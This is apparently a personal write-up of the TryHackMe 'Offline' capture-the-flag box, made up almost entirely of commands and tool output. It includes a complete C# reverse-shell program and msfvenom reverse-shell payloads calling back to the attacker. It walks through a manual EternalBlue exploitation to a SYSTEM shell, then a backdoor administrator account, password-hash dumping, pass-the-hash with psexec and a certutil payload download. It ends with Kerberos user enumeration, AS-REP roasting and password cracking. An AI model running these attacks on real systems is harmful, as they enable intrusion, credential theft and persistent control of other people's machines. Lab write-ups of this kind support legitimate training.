thm-offline-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a KOTH CTF called Offline at

https://tryhackme.com/

1st a nmap scan

root@kali:/opt/MS17-010-2012# nmap -A 10.10.148.6 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-18 03:19 EDT
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.148.6
Host is up (0.028s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst: 
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
| 3072 55:15:8d:d0:54:38:1b:d6:a9:9e:3f:b0:0b:b3:14:34 (RSA)
| 256 cf:5b:e2:de:ce:3b:04:e6:8c:24:6c:2f:37:25:05:c5 (ECDSA)
|_ 256 82:bf:bb:09:69:a7:25:5d:66:58:ea:c6:53:d8:c8:8e (ED25519)
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
|_http-server-header: Microsoft-IIS/8.5
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: Offline TV
| http-webdav-scan: 
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
| Server Date: Mon, 18 May 2020 07:22:26 GMT
| Server Type: Microsoft-IIS/8.5
| WebDAV type: Unkown
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Directory Listing: 
| http://10.10.148.6/
| http://10.10.148.6/iis-85.png
| http://10.10.148.6/iisstart.htm
| http://10.10.148.6/otv.jpg
| http://10.10.148.6/Scarras_Super_Secret_Password.txt
| Exposed Internal IPs: 
|_ 10.10.148.6
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 07:20:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kingofthe.domain, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
| fingerprint-strings: 
| SMBProgNeg: 
|_ SMBr
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kingofthe.domain, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Offline.kingofthe.domain
| Not valid before: 2020-04-07T00:07:50
|_Not valid after: 2020-10-07T00:07:50
|_ssl-date: 2020-05-18T07:22:27+00:00; 0s from scanner time.
9999/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/plain).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/18%Time=5EC23727%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/18%OT=21%CT=1%CU=30177%PV=Y%DS=2%DC=T%G=Y%TM=5EC2382
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=7
OS:)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M50
OS:8NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=64%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=64%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=64%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=64%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=64%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=64%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=64%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=64%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=64%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=64%CD=Z)

Network Distance: 2 hops
Service Info: Host: OFFLINE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m00s, deviation: 3h30m00s, median: 0s
|_nbstat: NetBIOS name: OFFLINE, NetBIOS user: <unknown>, NetBIOS MAC: 02:93:15:c9:fb:80 (unknown)
| smb-os-discovery: 
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: Offline
| NetBIOS computer name: 
| Domain name: kingofthe.domain
| Forest name: kingofthe.domain
| FQDN: Offline.kingofthe.domain
|_ System time: 2020-05-18T00:22:28-07:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-05-18 03:22:28
|_ start_date: 2020-05-18 02:55:02

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 27.46 ms 10.11.0.1
2 27.57 ms 10.10.148.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.54 seconds
root@kali:/opt/MS17-010-2012#

files used

MS17-010-2012.zip

MS17-010-2012.py

modify to fit your need

root@kali:/opt/MS17-010-2012# cat ms17-010-puckiestyle.py | grep .exe
smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe')
service_exec(conn, r'cmd /c c:\\puckieshell443.exe') 
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# executing binary generated by "msfvenom -f exe-service ..."
# Note: using Windows Service to execute command same as how psexec works
def service_exec(conn, cmd):

 

C# Simple Reverse Shell Code writing

Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
	public class Program
	{
		static StreamWriter streamWriter;

		public static void Main(string[] args)
		{
			using(TcpClient client = new TcpClient("10.0.2.15", 443))
			{
				using(Stream stream = client.GetStream())
				{
					using(StreamReader rdr = new StreamReader(stream))
					{
						streamWriter = new StreamWriter(stream);
						
						StringBuilder strInput = new StringBuilder();

						Process p = new Process();
						p.StartInfo.FileName = "cmd.exe";
						p.StartInfo.CreateNoWindow = true;
						p.StartInfo.UseShellExecute = false;
						p.StartInfo.RedirectStandardOutput = true;
						p.StartInfo.RedirectStandardInput = true;
						p.StartInfo.RedirectStandardError = true;
						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
						p.Start();
						p.BeginOutputReadLine();

						while(true)
						{
							strInput.Append(rdr.ReadLine());
							//strInput.Append("\n");
							p.StandardInput.WriteLine(strInput);
							strInput.Remove(0, strInput.Length);
						}
					}
				}
			}
		}

		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

	}
}
Simple Reverse shell C# code

root@kali:~# nc -lvp 443
listening on [any] 443 ...
Kali Linux in listening mode

I put my kali in listening mode on 443 port with netcat, compiled and executed my code.

Scan the exe file with no Threats found

As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.

file execution on victim machine

Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.178.14: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.14] 25852
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\PENTEST>
C:\PENTEST>whoami
lt-jacco\jacco
Running reconnaissance commands on victim machine from Kali Linux

Running the exe file will spawn immediately the shell on my Kali.

Finding the C# compiler (csc.exe)

dir /s %WINDIR%\CSC.EXE

Compiling

c:\PENTEST>c:\windows\Microsoft.NET\Framework\v3.5\csc.exe /t:exe /out:Simple_Rev_Shell443.exe Simple_Rev_Shell443.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.8931
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

Simple_Rev_Shell443.cs(64,34): warning CS0168: The variable 'err' is declared but never used

c:\PENTEST>dir Simple_Rev_Shell443.*
Volume in drive C is Boot
Volume Serial Number is 9488-7836

Directory of c:\PENTEST

09/02/2019 19:45 1.822 Simple_Rev_Shell443.cs
10/02/2019 10:27 5.120 Simple_Rev_Shell443.exe
2 File(s) 6.942 bytes
0 Dir(s) 6.854.045.696 bytes free

reference used : https://github.com/itaykrk/CSharp-reverse-tcp

Not for this, but if compiling saftykatz32.exe Why do I get the following error? Unsafe code may only appear if compiling with /unsafe”?vI work in C# and Visual Studio 2015 for programming on Windows .

To use unsafe code blocks, the project has to be compiled with the /unsafe switch on.

Open the properties for the project, go to the Build tab and check the Allow unsafe codecheckbox.

Let’s go exploting  MS17-010 the manual way.

root@kali:/opt/MS17-010-2012# python checker.py 10.10.148.6
Target OS: Windows Server 2012 R2 Standard 9600
The target is not patched

=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_OBJECT_NAME_NOT_FOUND

There may be times when you want to exploit MS17-010 (EternalBlue) without having to rely on using Metasploit. Perhaps you want to run it from a ‘Command & Control’ system without msf installed, run a quick demo or execute on the go. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside, however, is an increased risk of crashing the target. Kudos to Worawit Wang for making this easy.


Start by cloning the following repository:

$ git clone https://github.com/worawit/MS17-010.git

The shellcode directory holds (you guessed it) the kernel shellcodes.

$ ls -l MS17-010/shellcode/
total 44
-rw-r--r-- 1 root root 20305 Dec  2 22:03 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Dec  2 22:03 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Dec  2 22:03 eternalblue_sc_merge.py

The first step is to assemble shellcode to binary. You can do either one (depending which architecture your target is running), or assemble both and merge them to a single binary file. The latter is useful when you don’t know the target arch or if you are planning to run it against multiple systems with different architectures.


x64 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:

$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.11.3.122 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin

Concentrate payload & shellcode:

$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

x86 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:

$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.11.3.122 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin

Concentrate payload & shellcode:

$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

Merging binaries

This step is only necessary when you want both x64 and x86 in the same binary. Assuming that you followed the steps above for each architecture; merging is done with the included eternalblue_sc_merge.py script:

$ python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Targets

The eternalblue scripts are located in MS17-010/ and have the following targets.

eternalblue_exploit7.py:

  • Windows Server 2008 & R2
  • Windows Server 2012 & R2 (x86)
  • Windows Server 2016 (x64)
  • Windows Vista
  • Windows 7

eternalblue_exploit8.py:

  • Windows Server 2012 (x64)
  • Windows 8.1 & RT
  • Windows 10 (x64) (build < 14393)

Running exploit

Word of advice; running these blindly against the target is a bad idea. Be sure to enumerate the OS first. Also, expect your target to crash or force a reboot once the session is closed.

Example running against vulnerable Windows 7 host:

It is now possible to run ​ zzz_exploit.py​ . A named pipe is required to execute the script, and in
this case ​ ntsvcs​ works just fine.

root@kali:/opt/MS17-010-2012# python eternalblue_exploit8.py 10.10.241.183 /opt/MS17-010-2012//shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows Server 2012 R2 Standard 9600
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
done
root@kali:/opt/MS17-010-2012# nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.148.6] 49236
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\>hostname
hostname
Offline

C:\>dir flag.txt /s
dir flag.txt /s
 Volume in drive C has no label.
 Volume Serial Number is E403-33DE

 Directory of C:\Users\Administrator

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\fed

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\lily

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\mykull

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\poki

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\scarra

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\toast

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\yvonne

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

     Total Files Listed:
               8 File(s)            296 bytes
               0 Dir(s)  48,990,380,032 bytes free

C:\>
C:\Users\Administrator\king-server>dir
dir
Volume in drive C has no label.
Volume Serial Number is E403-33DE

Directory of C:\Users\Administrator\king-server

04/07/2020 08:12 PM <DIR> .
04/07/2020 08:12 PM <DIR> ..
04/14/2020 01:13 AM 0 king.txt
04/07/2020 08:16 PM 624 web.config
2 File(s) 624 bytes
2 Dir(s) 49,020,686,336 bytes free

C:\Users\Administrator\king-server>echo "puckiestyle" >> king.txt
echo "puckiestyle" >> king.txt

C:\Users\Administrator\king-server>type king.txt
type king.txt
"puckiestyle"
C:\Shares\King>dir
dir
Volume in drive C has no label.
Volume Serial Number is E403-33DE

Directory of C:\Shares\King

04/14/2020 02:16 PM <DIR> .
04/14/2020 02:16 PM <DIR> ..
04/13/2020 03:56 PM 25 exec.bat
05/18/2020 12:05 AM 83 king.txt
04/14/2020 03:32 PM 195 script.bat
3 File(s) 303 bytes
2 Dir(s) 48,962,973,696 bytes free

C:\Shares\King>type king.txt
type king.txt
"puckiestyle" 
has king! mykull queried king.txt at Mon 05/18/2020 0:05:01.04

C:\Shares\King>

Other stuff

Finding Users using https://github.com/trustedsec/ridenum

root@kali:/opt/ridenum# ./ridenum.py 10.10.227.210 500 50000 lily lolily
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: KingOfTheDomain
Domain Sid: S-1-5-21-2684872673-4160438805-3138582355
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
Account name: KingOfTheDomain\Administrator
Account name: KingOfTheDomain\Guest
Account name: KingOfTheDomain\krbtgt
Account name: KingOfTheDomain\OFFLINE$
Account name: KingOfTheDomain\mykull
Account name: KingOfTheDomain\poki
Account name: KingOfTheDomain\lily
Account name: KingOfTheDomain\toast
Account name: KingOfTheDomain\scarra
Account name: KingOfTheDomain\yvonne
Account name: KingOfTheDomain\fed
Account name: KingOfTheDomain\SVC_ROBOTARMY
[*] RIDENUM has finished enumerating user accounts...

.

root@kali:~/thm/offline# rpcclient -U "lily" 10.10.227.210
Enter WORKGROUP\lily's password: 
rpcclient $> lsaquery
Domain Name: KingOfTheDomain
Domain Sid: S-1-5-21-2684872673-4160438805-3138582355
rpcclient $> queryuser mykull
User Name : mykull
Full Name : Mykull Reeves
Home Drive : 
Dir Drive : 
Profile Path: 
Logon Script: 
Description : NightmareNightmareNightmareNightmare
Workstations: 
Comment : 
Remote Dial :
Logon Time : Thu, 28 May 2020 04:35:17 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 21:48:05 EST
Password last set Time : Sun, 05 Apr 2020 20:03:40 EDT
Password can change Time : Mon, 06 Apr 2020 20:03:40 EDT
Password must change Time: Wed, 13 Sep 30828 21:48:05 EST
unknown_2[0..31]...
user_rid : 0x452
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x000000c4
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[mykull] rid:[0x452]
user:[poki] rid:[0x453]
user:[lily] rid:[0x454]
user:[toast] rid:[0x455]
user:[scarra] rid:[0x456]
user:[yvonne] rid:[0x457]
user:[fed] rid:[0x458]
user:[SVC_ROBOTARMY] rid:[0x459]




 

 

C:\Users\Administrator\king-server>net user /add puckie Style! net user /add puckie Style! The command completed successfully. C:\Users\Administrator\king-server>net localgroup administrators puckie /add net localgroup administrators puckie /add The command completed successfully.

root@kali:/opt/git clone https://github.com/Hackplayers/evil-winrm.git
root@kali:/opt/evil-winrm# gem install winrm-fs
Fetching: rubyzip-2.3.0.gem (100%)
Successfully installed rubyzip-2.3.0
Fetching: winrm-fs-1.3.4.gem (100%)
Successfully installed winrm-fs-1.3.4
Parsing documentation for rubyzip-2.3.0
Installing ri documentation for rubyzip-2.3.0
Parsing documentation for winrm-fs-1.3.4
Installing ri documentation for winrm-fs-1.3.4
Done installing documentation for rubyzip, winrm-fs after 2 seconds
2 gems installed
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.148.6 -u puckie -p 'Style!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\puckie\Documents> whoami
kingofthedomain\puckie

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.148.6 -u puckie -p 'Style!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\puckie\Documents> upload pwdump8.exe
Info: Uploading pwdump8.exe to C:\Users\puckie\Documents\pwdump8.exe


Data: 1479336 bytes of 1479336 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\puckie\Documents> ./pwdump8.exe

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3[redacted]04EE:E6E9[redacted]91B7
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

*Evil-WinRM* PS C:\Users\puckie\Documents>
E:\OSCP>psexecimpacket.exe -hashes AAD3[redacted]04EE:E6E9[redacted]91B7 administrator@10.10.144.236
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.144.236.....
[*] Found writable share ADMIN$
[*] Uploading file bgMvCpRw.exe
[*] Opening SVCManager on 10.10.144.236.....
[*] Creating service yUne on 10.10.144.236.....
[*] Starting service yUne.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Offline
C:\Windows\system32>mkdir puck
C:\Windows\system32>certutil -urlcache -split -f http://10.11.3.122/pwdump8.exe C:\puck\pwdump8.exe

.
c:\Python37>kerbrute_windows_amd64.exe userenum --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

2020/05/22 16:02:50 >  Using KDC(s):
2020/05/22 16:02:50 >   offline.kingofthe.domain:88
2020/05/22 16:02:50 >  [+] VALID USERNAME:       mykull@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       toast@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       administrator@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       puckie@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       guest@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       poki@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       scarra@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       lily@kingofthe.domain
2020/05/22 16:02:50 >  [+] VALID USERNAME:       yvonne@kingofthe.domain
2020/05/22 16:02:50 >  Done! Tested 9 usernames (9 valid) in 0.083 seconds
.
.

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.170.52 -u toast -p 'IsItHotInHere,OrIsItJustMe'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\toast\Documents> cd..
*Evil-WinRM* PS C:\Users\toast> type flag.txt
THM{4F2900F2FDFAF3F77BD599391218F49F}
*Evil-WinRM* PS C:\Users\toast>
root@kali:~/thm/offline# GetNPUsers.py -dc-ip 10.10.236.199 kingofthe.domain/ -usersfile users.txt
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fed doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb
[-] User poki doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User scarra doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User toast doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yvonne doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
E:\PENTEST\hashcat>hashcat32.exe -m 18200 -a 0 -w 3 kingofthedomain.hash e:\pentest\hashcat\rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU
* Device #2: Intel(R) Pentium(R) CPU 4415U @ 2.30GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: e:\pentest\hashcat\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 10 secs

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86...d5b2fb
Time.Started.....: Thu May 21 13:34:57 2020 (8 secs)
Time.Estimated...: Thu May 21 13:35:31 2020 (26 secs)
Guess.Base.......: File (e:\pentest\hashcat\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 415.6 kH/s (91.29ms) @ Accel:64 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 3391488/14344384 (23.64%)
Rejected.........: 0/3391488 (0.00%)
Restore.Point....: 3391488/14344384 (23.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: taz1997 -> taladascercal

$krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb:lolily

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$lily@KINGOFTHE.DOMAIN:0280f7ba2754b86...d5b2fb
Time.Started.....: Thu May 21 13:34:57 2020 (15 secs)
Time.Estimated...: Thu May 21 13:35:12 2020 (0 secs)
Guess.Base.......: File (e:\pentest\hashcat\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 414.3 kH/s (91.35ms) @ Accel:64 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6144000/14344384 (42.83%)
Rejected.........: 0/6144000 (0.00%)
Restore.Point....: 6094848/14344384 (42.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: lookie123 -> lizyjeancarlos

Started: Thu May 21 13:34:42 2020
Stopped: Thu May 21 13:35:14 2020

E:\PENTEST\hashcat>
or we use john

E:\john-1.9.0-jumbo-1-win64\run>john.exe kingofthedomain.hash -wordlist=e:\pentest\hashcat\rockyou.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE4.1 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 24.27% (ETA: 13:53:30) 0g/s 489115p/s 489115c/s 489115C/s snickers47..snezzticle
